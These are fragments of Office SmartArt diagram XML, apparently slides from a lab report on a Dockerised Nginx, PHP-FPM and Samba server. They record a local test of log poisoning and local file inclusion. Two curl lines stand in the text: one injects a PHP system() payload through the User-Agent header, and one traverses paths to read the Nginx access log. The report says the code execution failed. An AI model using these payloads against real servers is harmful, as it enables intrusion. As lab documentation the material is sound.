    <dgm:cxn modelId="{6F6D2121-25A3-4ABE-9DF6-08B83F68CDB3}" type="presParOf" srcId="{0004756B-94C7-4337-A08F-2BC00A4C57E4}" destId="{0FAE2704-E67F-469F-9E2E-28E8F4B4AD5B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{C72795D5-6020-4AB4-8FBB-4D4F06604EEF}" type="presParOf" srcId="{7ED68249-8ACF-4155-9848-4E4A90AE5670}" destId="{00C0D873-FDB4-43B3-8745-6D8D7026A357}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{B4D42D0D-18A0-4019-AB97-5DEA8D4DC0B5}" type="presParOf" srcId="{7ED68249-8ACF-4155-9848-4E4A90AE5670}" destId="{BAA20668-4968-44F2-B76D-434C72C633D6}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{AF2E9C16-DBC9-4503-BDA6-24BD15C02C94}" type="presParOf" srcId="{BAA20668-4968-44F2-B76D-434C72C633D6}" destId="{6CECB7AE-3576-4085-811E-037772829E22}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{2F856ABC-2C87-4B3E-BEF4-A5BA656A1953}" type="presParOf" srcId="{7ED68249-8ACF-4155-9848-4E4A90AE5670}" destId="{84CE5DD9-C805-4E2E-817A-1A0B994246F1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429FD58-56F5-43B5-A3DC-FD4A96BC648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0D90011-E7CF-44C1-8401-1C4EEA42DF13}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>-&gt;Secure Server Docker environment built successfully using the provided Dockerfile and build script.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{081ED087-9F0C-416E-88BF-13A84BCA18CF}" type="parTrans" cxnId="{AAA7E6B3-294B-46A8-B30B-B5A83BCBFC99}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99BCE222-E80A-4D47-906A-32711F282A16}" type="sibTrans" cxnId="{AAA7E6B3-294B-46A8-B30B-B5A83BCBFC99}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3799FC3E-84B7-4B92-BE11-7F0A4874A012}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>-&gt;Services running inside Docker:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7C18411-B123-4317-B165-C78209A592E6}" type="parTrans" cxnId="{FA86396B-0E1C-4FE1-974A-245CA7F27A70}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C73FE085-FB7F-436A-ACEC-34678DE5BBA6}" type="sibTrans" cxnId="{FA86396B-0E1C-4FE1-974A-245CA7F27A70}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF1E2C5A-796C-490A-9803-00BE43185909}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>-&gt;Nginx (web server)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4657A1D4-83ED-4565-9B85-F78880698304}" type="parTrans" cxnId="{5C4ED5EF-D210-4C71-AF92-C2A49343C6FA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D7A4585-8851-4D0D-9230-BC3D9BBE4FBF}" type="sibTrans" cxnId="{5C4ED5EF-D210-4C71-AF92-C2A49343C6FA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D4088DB-7580-464C-9CBB-481ABBA16A39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>-&gt;PHP-FPM (PHP processing)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36919EC3-7F86-49CA-879C-F73902242ADB}" type="parTrans" cxnId="{2C7C7F87-A2E1-4EE9-8E21-FE777AC77608}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C12D78B8-68B9-4EA9-8A24-774662985EB4}" type="sibTrans" cxnId="{2C7C7F87-A2E1-4EE9-8E21-FE777AC77608}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6F613840-2D79-4539-A1E5-A59D17D44331}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>-&gt;Samba (SMB for file sharing)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1652AA4A-2C91-420A-9BBE-B55181EFC126}" type="parTrans" cxnId="{B921635C-F167-48FA-92CD-CBA93801F98D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F460A4A3-A02C-4222-A65B-D9E5B9277865}" type="sibTrans" cxnId="{B921635C-F167-48FA-92CD-CBA93801F98D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B28885B-909C-4FA0-9358-30ACCD7CF680}" type="pres">
      <dgm:prSet presAssocID="{6429FD58-56F5-43B5-A3DC-FD4A96BC6486}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{946C93E2-23E9-40E9-B530-6B2DF77982D1}" type="pres">
      <dgm:prSet presAssocID="{B0D90011-E7CF-44C1-8401-1C4EEA42DF13}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{64466146-AAF9-4249-A3B8-5F52C20662D2}" type="pres">
      <dgm:prSet presAssocID="{B0D90011-E7CF-44C1-8401-1C4EEA42DF13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ADD19513-CFBD-4DE8-88D2-3FEC0BEC8E85}" type="pres">
      <dgm:prSet presAssocID="{99BCE222-E80A-4D47-906A-32711F282A16}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2D99FF86-D130-48AE-93AA-DCFEDD454725}" type="pres">
      <dgm:prSet presAssocID="{3799FC3E-84B7-4B92-BE11-7F0A4874A012}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{56C6D416-7918-4BD1-B6E4-E7978C913F28}" type="pres">
      <dgm:prSet presAssocID="{3799FC3E-84B7-4B92-BE11-7F0A4874A012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3B4C37BA-7448-429A-BF4D-8296A9A17800}" type="pres">
      <dgm:prSet presAssocID="{C73FE085-FB7F-436A-ACEC-34678DE5BBA6}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F573E34E-4AFB-4413-8347-248EEF86814A}" type="pres">
      <dgm:prSet presAssocID="{EF1E2C5A-796C-490A-9803-00BE43185909}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{68A17801-78DB-4DBE-8DC0-BDECD32746FC}" type="pres">
      <dgm:prSet presAssocID="{EF1E2C5A-796C-490A-9803-00BE43185909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4C7F063C-4A10-4D46-8BAD-0B9CA97844F4}" type="pres">
      <dgm:prSet presAssocID="{5D7A4585-8851-4D0D-9230-BC3D9BBE4FBF}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{78EA6135-15CD-425A-8F50-6496BC36138F}" type="pres">
      <dgm:prSet presAssocID="{8D4088DB-7580-464C-9CBB-481ABBA16A39}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6E446B22-99AC-48E8-8C98-6C4BA7961C95}" type="pres">
      <dgm:prSet presAssocID="{8D4088DB-7580-464C-9CBB-481ABBA16A39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81B62BC4-901C-478A-ABA4-0803CCCDE6FE}" type="pres">
      <dgm:prSet presAssocID="{C12D78B8-68B9-4EA9-8A24-774662985EB4}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C75059F-98BC-4A4D-9AF2-F23434753B2D}" type="pres">
      <dgm:prSet presAssocID="{6F613840-2D79-4539-A1E5-A59D17D44331}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E2B938E1-7E61-4862-B4A8-4D898BB3C8E0}" type="pres">
      <dgm:prSet presAssocID="{6F613840-2D79-4539-A1E5-A59D17D44331}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{93C21911-8E54-4250-9C57-838BE0426512}" type="presOf" srcId="{EF1E2C5A-796C-490A-9803-00BE43185909}" destId="{68A17801-78DB-4DBE-8DC0-BDECD32746FC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1CE49820-0D59-4F4A-8620-8B5185AE9761}" type="presOf" srcId="{3799FC3E-84B7-4B92-BE11-7F0A4874A012}" destId="{56C6D416-7918-4BD1-B6E4-E7978C913F28}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FAE7FF20-73CF-4F12-804E-E7CF3D72078B}" type="presOf" srcId="{8D4088DB-7580-464C-9CBB-481ABBA16A39}" destId="{6E446B22-99AC-48E8-8C98-6C4BA7961C95}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4D699F37-6EA6-475E-8B08-69EB2BED35A9}" type="presOf" srcId="{6429FD58-56F5-43B5-A3DC-FD4A96BC6486}" destId="{4B28885B-909C-4FA0-9358-30ACCD7CF680}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B921635C-F167-48FA-92CD-CBA93801F98D}" srcId="{6429FD58-56F5-43B5-A3DC-FD4A96BC6486}" destId="{6F613840-2D79-4539-A1E5-A59D17D44331}" srcOrd="4" destOrd="0" parTransId="{1652AA4A-2C91-420A-9BBE-B55181EFC126}" sibTransId="{F460A4A3-A02C-4222-A65B-D9E5B9277865}"/>
    <dgm:cxn modelId="{FA86396B-0E1C-4FE1-974A-245CA7F27A70}" srcId="{6429FD58-56F5-43B5-A3DC-FD4A96BC6486}" destId="{3799FC3E-84B7-4B92-BE11-7F0A4874A012}" srcOrd="1" destOrd="0" parTransId="{E7C18411-B123-4317-B165-C78209A592E6}" sibTransId="{C73FE085-FB7F-436A-ACEC-34678DE5BBA6}"/>
    <dgm:cxn modelId="{30A81B4F-3FD6-43AB-A2D2-50CFDD6E221F}" type="presOf" srcId="{B0D90011-E7CF-44C1-8401-1C4EEA42DF13}" destId="{64466146-AAF9-4249-A3B8-5F52C20662D2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2C7C7F87-A2E1-4EE9-8E21-FE777AC77608}" srcId="{6429FD58-56F5-43B5-A3DC-FD4A96BC6486}" destId="{8D4088DB-7580-464C-9CBB-481ABBA16A39}" srcOrd="3" destOrd="0" parTransId="{36919EC3-7F86-49CA-879C-F73902242ADB}" sibTransId="{C12D78B8-68B9-4EA9-8A24-774662985EB4}"/>
    <dgm:cxn modelId="{AAA7E6B3-294B-46A8-B30B-B5A83BCBFC99}" srcId="{6429FD58-56F5-43B5-A3DC-FD4A96BC6486}" destId="{B0D90011-E7CF-44C1-8401-1C4EEA42DF13}" srcOrd="0" destOrd="0" parTransId="{081ED087-9F0C-416E-88BF-13A84BCA18CF}" sibTransId="{99BCE222-E80A-4D47-906A-32711F282A16}"/>
    <dgm:cxn modelId="{B320DFB9-983A-4023-A51C-DD9E61E2D0FC}" type="presOf" srcId="{6F613840-2D79-4539-A1E5-A59D17D44331}" destId="{E2B938E1-7E61-4862-B4A8-4D898BB3C8E0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5C4ED5EF-D210-4C71-AF92-C2A49343C6FA}" srcId="{6429FD58-56F5-43B5-A3DC-FD4A96BC6486}" destId="{EF1E2C5A-796C-490A-9803-00BE43185909}" srcOrd="2" destOrd="0" parTransId="{4657A1D4-83ED-4565-9B85-F78880698304}" sibTransId="{5D7A4585-8851-4D0D-9230-BC3D9BBE4FBF}"/>
    <dgm:cxn modelId="{529F14C7-A624-4722-91DB-F4DC70F3E2B8}" type="presParOf" srcId="{4B28885B-909C-4FA0-9358-30ACCD7CF680}" destId="{946C93E2-23E9-40E9-B530-6B2DF77982D1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{56932C33-8CBE-4F4C-83D5-A3A95A35C30E}" type="presParOf" srcId="{946C93E2-23E9-40E9-B530-6B2DF77982D1}" destId="{64466146-AAF9-4249-A3B8-5F52C20662D2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7FE57440-6749-4AEF-B207-97177FD59125}" type="presParOf" srcId="{4B28885B-909C-4FA0-9358-30ACCD7CF680}" destId="{ADD19513-CFBD-4DE8-88D2-3FEC0BEC8E85}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{58C601B2-4691-48DB-8085-DD2DEA1EE00E}" type="presParOf" srcId="{4B28885B-909C-4FA0-9358-30ACCD7CF680}" destId="{2D99FF86-D130-48AE-93AA-DCFEDD454725}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8B3D4DFC-3652-4668-A7B7-F9A2DDA4F9AA}" type="presParOf" srcId="{2D99FF86-D130-48AE-93AA-DCFEDD454725}" destId="{56C6D416-7918-4BD1-B6E4-E7978C913F28}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{29BD8A5B-931C-43EA-8123-54E456B58AE7}" type="presParOf" srcId="{4B28885B-909C-4FA0-9358-30ACCD7CF680}" destId="{3B4C37BA-7448-429A-BF4D-8296A9A17800}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4FD16E47-3B16-40D9-AC01-CE518F66F5DC}" type="presParOf" srcId="{4B28885B-909C-4FA0-9358-30ACCD7CF680}" destId="{F573E34E-4AFB-4413-8347-248EEF86814A}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8B020B93-F37D-41A2-BB04-4AE6B91A6730}" type="presParOf" srcId="{F573E34E-4AFB-4413-8347-248EEF86814A}" destId="{68A17801-78DB-4DBE-8DC0-BDECD32746FC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E53FB50C-883B-411C-B9B7-39720DD1AD46}" type="presParOf" srcId="{4B28885B-909C-4FA0-9358-30ACCD7CF680}" destId="{4C7F063C-4A10-4D46-8BAD-0B9CA97844F4}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{65684F03-2755-443E-8625-97F805D2D70D}" type="presParOf" srcId="{4B28885B-909C-4FA0-9358-30ACCD7CF680}" destId="{78EA6135-15CD-425A-8F50-6496BC36138F}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{11624331-15C6-4D78-9CCC-610659D335CF}" type="presParOf" srcId="{78EA6135-15CD-425A-8F50-6496BC36138F}" destId="{6E446B22-99AC-48E8-8C98-6C4BA7961C95}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{10F787FB-C65D-4F2E-8184-9932D11911A0}" type="presParOf" srcId="{4B28885B-909C-4FA0-9358-30ACCD7CF680}" destId="{81B62BC4-901C-478A-ABA4-0803CCCDE6FE}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3BE7E2BE-1FDA-48FA-86FC-C883B6FA99C0}" type="presParOf" srcId="{4B28885B-909C-4FA0-9358-30ACCD7CF680}" destId="{3C75059F-98BC-4A4D-9AF2-F23434753B2D}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0A4186B8-529A-4E57-B967-0CBEA78BD8B1}" type="presParOf" srcId="{3C75059F-98BC-4A4D-9AF2-F23434753B2D}" destId="{E2B938E1-7E61-4862-B4A8-4D898BB3C8E0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4537-F208-4000-BDC0-AEA342E495C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5A7E4C0-A379-4895-B6F7-C8AD3B5EBCEF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>Injected PHP payload via the User-Agent header using curl:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB51D7EE-B2C1-4251-A43C-3D6518A3D392}" type="parTrans" cxnId="{7DBD6ED3-2AF0-478F-A970-F659E0C0C8AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{036CB032-2F3D-4808-80D9-62A529EBAE1D}" type="sibTrans" cxnId="{7DBD6ED3-2AF0-478F-A970-F659E0C0C8AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{450BF256-40E9-4A40-BBD9-AE53DE5C3703}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>curl -A "&lt;?php system('id'); ?&gt;" http://127.0.0.1/</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4081DBF6-E8B8-4D38-B424-CC56CAE6825A}" type="parTrans" cxnId="{C1257550-468D-4153-9F19-770770399E6C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{125078C4-51B5-4D9B-9F70-90CAE791FFEA}" type="sibTrans" cxnId="{C1257550-468D-4153-9F19-770770399E6C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2AB6C8DB-0E8D-478E-BA1D-A295FE6DB490}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>Successfully retrieved the Nginx access logs using Local File Inclusion (LFI):</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6895ACA6-C3D5-4E1B-B848-38ED6E2E913B}" type="parTrans" cxnId="{A6143BD9-D3C4-4207-B849-6DBD24600601}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{06135685-1DBE-490B-A774-A178888C1B5B}" type="sibTrans" cxnId="{A6143BD9-D3C4-4207-B849-6DBD24600601}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{545CC548-490C-4023-B43A-7F0196913B93}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>curl "http://127.0.0.1/our-projects.php?project=../../../../var/log/nginx/access.log"</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D863C5BE-361A-42D6-B6B4-41D56200C650}" type="parTrans" cxnId="{25721D02-3DD5-411C-96E5-936BEE20875F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8646B19C-F62C-4006-A5AB-A193D03A8070}" type="sibTrans" cxnId="{25721D02-3DD5-411C-96E5-936BEE20875F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A8A009B-01CA-4F3C-AA3D-6818C02212FA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>Log entries confirmed injection, but PHP payload was not executed (logged as plain text).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{342455F6-8A0C-4951-AF42-45E848EEF7C0}" type="parTrans" cxnId="{7779B1AF-58AC-4727-9C41-1584FCD483FB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F62896A-7E80-4D3C-B3D4-C1D2E59E3BA7}" type="sibTrans" cxnId="{7779B1AF-58AC-4727-9C41-1584FCD483FB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DEE7C82E-435D-46AD-B8D1-33EA55318398}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>Conclusion:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F3959916-7B41-4CF1-9E2E-C01EAEE2E798}" type="parTrans" cxnId="{5852D494-C602-4CE0-B3F2-E953F43891F8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29269DEA-A1DD-4987-A43E-3CAA0A29F8C8}" type="sibTrans" cxnId="{5852D494-C602-4CE0-B3F2-E953F43891F8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9C696A35-F60D-4F51-B1EC-3241DC881D26}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0"/>
            <a:t>· LFI vulnerability confirmed but log poisoning failed to trigger PHP code execution.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CBEFDF70-404C-45E0-A040-CDD60936E58A}" type="parTrans" cxnId="{47291931-8438-4777-B07D-E5CFD96AFFEF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{779C7E54-AC62-4864-AA00-7CF38763DE10}" type="sibTrans" cxnId="{47291931-8438-4777-B07D-E5CFD96AFFEF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95AB0B44-19FF-4989-9D8D-223860A36811}" type="pres">
      <dgm:prSet presAssocID="{1E6A4537-F208-4000-BDC0-AEA342E495C3}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DB1C545F-6748-4DA7-8B30-11811361D0B0}" type="pres">
      <dgm:prSet presAssocID="{55A7E4C0-A379-4895-B6F7-C8AD3B5EBCEF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7B597BA6-2CE4-468B-BBA7-6E18A595BB49}" type="pres">
      <dgm:prSet presAssocID="{036CB032-2F3D-4808-80D9-62A529EBAE1D}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{528555C8-0CF9-4DAE-B7CC-9E71D49778EC}" type="pres">
      <dgm:prSet presAssocID="{450BF256-40E9-4A40-BBD9-AE53DE5C3703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3CBDFC58-53CD-41A2-9F5B-22F8FAC5E752}" type="pres">
